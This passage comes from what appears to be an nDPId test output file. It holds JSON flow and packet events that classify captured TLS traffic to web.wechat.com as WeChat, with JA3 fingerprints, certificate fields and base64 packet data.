-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"wechat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1492167354015,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167354015,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0vARAACwGbKDLzZeiwKgBZwG700XrPygSQPLrM4ARAHCW2wAAAQEICkXRpNsAMLqb"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"wechat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1492167354015,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167354015,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0QwRAAEAG0kDAqAFny82XotNFAbtA8usz6z8oE4AQAOWWFAAAAQEICgAwuu1F0aTb"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"wechat.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1492167354046,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1492167354046,"pkt":"eJKcD6iO8IQvSpdgCABFoAAoK49AAC4G+vDLzZfTwKgBZwG7nyV4LkCkZw70h1AQAHPUZwAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"wechat.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1492167354049,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1492167354049,"pkt":"eJKcD6iO8IQvSpdgCABFoAAoK5BAAC4G+u\/LzZfTwKgBZwG7nyV4LkCkZw70h1ARAHPUZgAA"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1492167354049,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167354049,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG700mLgJvryODc86ASN8g1VAAAAgQFoAQCCApF8RJmADC6mwEDAwc="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1492167354049,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167354049,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0ZmpAAEAGrtrAqAFny82XotNJAbvI4Nzzi4Cb7IAQAOWalAAAAQEICgAwuvZF8RJm"} -00842{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167353687,"flow_last_seen":1492167354049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167354049,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1492167354296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167354296,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC4GJp3LzZeiwKgBZwG700oogx9AoQ\/Rp6ASN8hHnAAAAgQFoAQCCApF8RKkADC62gEDAwc="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1492167354296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167354296,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0a31AAEAGqcfAqAFny82XotNKAbuhD9GnKIMfQYAQAOWs3QAAAQEICgAwuzRF8RKk"} -00899{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":98,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167353687,"flow_last_seen":1492167354430,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167354430,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":100,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167353687,"flow_last_seen":1492167354487,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167354487,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167353937,"flow_last_seen":1492167355372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167355372,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -02079{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1492167355388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1254,"pkt_l4_len":1220,"thread_ts_msec":1492167355388,"pkt":"8IQvSpdgeJKcD6iOCABFAATYn8NAAEAGcN3AqAFny82XotMqAbshWCCwT4FL\/oAYAchBqgAAAQEICgAwvEVF0aSGFwMDBJ8AAAAAAAAACSCXh69SRVNj7LxTHyTa29lyIMx5rUn\/Kbsx2RSLcx6h5Rof7MvhSBslxiMA7RM+grN19AFhFkb86ybE4QzYLqZogvxRJjzavJpiSw0h2JHTRLw5hxkIJT93\/hBnX4KXAJggRKu+zDGdqHHdv4fTutm2SVgm7d7YrX77rNoEa49Z7tjdE+lO2DuQkrDWrkIcPj0eYPzI9xDvhacp1zu+uHhR194mvhqvVQzKnG9JQA7M8yc34zhOP58E3OjjXwz3ELzMbE8lsUYni0FdVDzD5AHz2ZXkJTACi6epY43d8swMwJs750LtRYiDdf+30r4284+LeVd8LVUpJU\/rrav+ZKJhyQ9sw9XMWliErx\/Hsl\/5h3MZRKZeqbDE6P8CmhyiQOuweltYgaOp1rsNtfHpo493xewTpz5snn5PbRcKUqFF5M4r7lhwPPhIeVK4WOUH\/33+Sq98q7EPLrHMUFohSF90hiJaXtAj+rHVK1gMf9oOJW2ySdU7MX2DS86yuQ6kfFtJuGuxo1Cz6PJoomwid9YpsbBbTMx6m4z9l\/ny1t10Pd97BylHaTo6YBGXBgtaz8dbyFkkD5Nbk5dwtmaGlM9uIlF\/rv5c1A55dbIdj8naBbyQ7fTwTJFbjISBkJmpaQoU2kc\/zziP44xaoDUxaRt9Ry\/806C0HPovj+JC6hKAJhd7IU3lz1cd2EcOR09Ulbh6GcnGtGoIEgMSnOqlHSHFOvhwMJOgqMdjV4Ts3j6kz4nuUL7P9W38WCZ6Et6v6MCfJC1NHlb+BiknubpqgZZ7mM9\/dQzJwaHAVm1pExnTA0Qtn9u2w0Ob0wTvtwWHLqB8+w1X5lLgz+g0\/KazNnFwZsVC8NJt7gXfJimXlNiQyyoVZPRU5TsryE76p7eJsfK2K3vD+oV2xOy0odJivKdVU9d\/b0lN4vXAAJXGR8apbNgPqwivAZHIvQdWqFgNwio4MLv0L8zBSqiIiaIpEMDbJPlGf3NTa8KHL9KuF0\/XkvPuIqyQ1vikTJWv3M0PfnYGX\/91JwgIycN3X4tfAJPTYU1bJR8H9lqbTS68wW7e8n7Z9kn4BsSK8WdGfSG\/BGchlsNazeLO6dljFOzNH1Nb0yqv79UpRl3Kr1HkZo+mQcyTmdDq73MBTVTodPICJb5JR1YLjVlWLyhlubA3PMAZhd7v493hq7IuxuvrhHldQDGHsYcPZ0+ZYWLqkDletWw1l3zV0GxsjRhJ3s3iffY9XBpGE8EG39zicWNmnu8THVvBYw\/7ASp9iDFLWiJkigPswdmPFhkbbEWproj9M3h6bBS7Z9ohy6yUXPGG6RKTKX45Eg\/Pm2f3Y3bPQ15p4S5E260\/wYzmk6Pco8MZXXOtCrfsbgBU3U\/QFaYJziOi8kV14C9ocoOj7UNbOPlK4JGIThUQC22wBIoO4QcICqfGi12dFi3\/dZawWcVCDgNfdmaRqjA7vn2Ew3dMX8AfiCfUGFCye6yKRfSC\/KcvJGql1sIadq+izTaBp+jfWADKBhJTOB7x6VUd2Bs6qIc6mkvKSj4SxqM+NPNL5GVHDR9qjJ4H5zSi"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167355723,"flow_last_seen":1492167355723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167355723,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1492167355723,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167355723,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8P4ZAAEAG1bbAqAFny82XotNLAbtsCoMeAAAAAKACchAveAAAAgQFtAQCCAoAMLyYAAAAAAEDAwc="} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":124,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167353937,"flow_last_seen":1492167355743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167355743,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":126,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167353937,"flow_last_seen":1492167355744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167355744,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1492167356077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167356077,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG700uz8YPYbAqDH6ASN8iq2QAAAgQFoAQCCApFrUFyADC8mAEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1492167356077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167356077,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0P4dAAEAG1b3AqAFny82XotNLAbtsCoMfs\/GD2YAQAOUQHAAAAQEICgAwvPFFrUFy"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167355723,"flow_last_seen":1492167356077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167356077,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":151,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167355723,"flow_last_seen":1492167356488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167356488,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":153,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167355723,"flow_last_seen":1492167356489,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167356489,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1492167360622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":121,"pkt_l4_len":87,"thread_ts_msec":1492167360622,"pkt":"eJKcD6iO8IQvSpdgCABFoABrfSgAADcGnizYOs1OwKgBZwG7ugsgLP3V+HJvr4AYAV2wggAAAQEICvap78EAL9cAFwMDADI7\/WDixcApjMc4oo49oFJiwuyoshtW5rSqz9ahoHcSOkzcmjO3CkNO6pgK6XLAf2uLNg=="} -00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1492167360626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":121,"pkt_l4_len":87,"thread_ts_msec":1492167360626,"pkt":"eJKcD6iO8IQvSpdgCABFoABr4O8AADcGG8es2RdOwKgBZwG7z+SKJZg8+z2t2oAYAVTREQAAAQEICn7IL7IAL9cCFwMDADL\/QQeiav2tbjoNjgJzOU4UPNZPR4RzRuOQ+h3eXjLhIIWjbE1Sb3YuyocNPQRCTo9EPA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167366908,"flow_last_seen":1492167366908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167366908,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1492167366908,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167366908,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8lZ5AAEAGf57AqAFny82XotNMAbt+X1IbAAAAAKACchBDOAAAAgQFtAQCCAoAMMeFAAAAAAEDAwc="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":184,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167367159,"flow_last_seen":1492167367159,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167367159,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54093,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1492167367159,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167367159,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8UGVAAEAGxNfAqAFny82XotNNAbtphJemAAAAAKACchASSQAAAgQFtAQCCAoAMMfDAAAAAAEDAwc="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1492167367227,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167367227,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG700zSrc67fl9SHKASN8jkhQAAAgQFoAQCCApF0bHCADDHhQEDAwc="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1492167367227,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167367227,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0lZ9AAEAGf6XAqAFny82XotNMAbt+X1Ic0q3OvIAQAOVJ0gAAAQEICgAwx9RF0bHC"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":187,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167366908,"flow_last_seen":1492167367228,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167367228,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1492167367489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167367489,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG7002nXL3IaYSXp6ASN8hVJQAAAgQFoAQCCApFrUycADDHwwEDAwc="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1492167367489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167367489,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0UGZAAEAGxN7AqAFny82XotNNAbtphJenp1y9yYAQAOW6bQAAAQEICgAwyBZFrUyc"} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":196,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167366908,"flow_last_seen":1492167367549,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167367549,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 